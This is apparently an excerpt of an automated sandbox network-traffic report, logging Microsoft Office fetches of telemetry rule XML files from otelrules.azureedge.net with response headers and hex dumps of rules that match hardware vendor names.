                                                                                                                                                                                          2024-11-23 16:44:30 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          21192.168.2.54973013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:30 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:30 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB344914B"
                                                                                                                                                                                          x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164430Z-174c587ffdfdwxdvhC1TEB1c4n000000030000000000r76t
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:30 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          22192.168.2.54973113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:30 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:30 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                          x-ms-request-id: 6171fc9e-701e-000d-441c-3d6de3000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164430Z-178bfbc474bwlrhlhC1NYCy3kg00000004t0000000005u5y
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:30 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          23192.168.2.54973413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:30 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:30 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9698189B"
                                                                                                                                                                                          x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164430Z-174c587ffdfmrvb9hC1TEBtn38000000039g000000001dns
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:30 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          24192.168.2.54973313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:30 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:30 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9018290B"
                                                                                                                                                                                          x-ms-request-id: 81a1b48f-901e-00ac-7058-3cb69e000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164430Z-15b8b599d8885prmhC1TEBsnkw000000039000000000dm64
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:30 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          25192.168.2.54973613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:32 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:32 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                          x-ms-request-id: 21648528-e01e-003c-794e-3cc70b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164432Z-178bfbc474bpscmfhC1NYCfc2c00000003ag000000008qxv
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:32 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          26192.168.2.54973513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:32 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:32 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:32 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 469
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                          ETag: "0x8DC582BBA701121"
                                                                                                                                                                                          x-ms-request-id: 000c37a0-d01e-002b-0920-3d25fb000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164432Z-15b8b599d88s6mj9hC1TEBur30000000033g000000002tde
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:32 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          27192.168.2.54973813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:32 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:32 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 464
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                          ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                          x-ms-request-id: 918e3103-701e-0097-4a7c-3bb8c1000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164432Z-174c587ffdf7t49mhC1TEB4qbg00000002zg00000000r1nz
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:32 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          28192.168.2.54973713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:32 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:32 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                          x-ms-request-id: 7e74133f-e01e-003c-0667-3dc70b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164432Z-15b8b599d886w4hzhC1TEBb4ug000000035000000000kbmt
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:33 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          29192.168.2.54973913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:32 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:32 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 494
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                          x-ms-request-id: 63c277cf-401e-0029-7f06-3d9b43000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164432Z-178bfbc474btrnf9hC1NYCb80g00000004vg00000000ckxd
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:33 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          30192.168.2.54974213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:34 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:35 UTC470INHTTP/1.1 200 OK
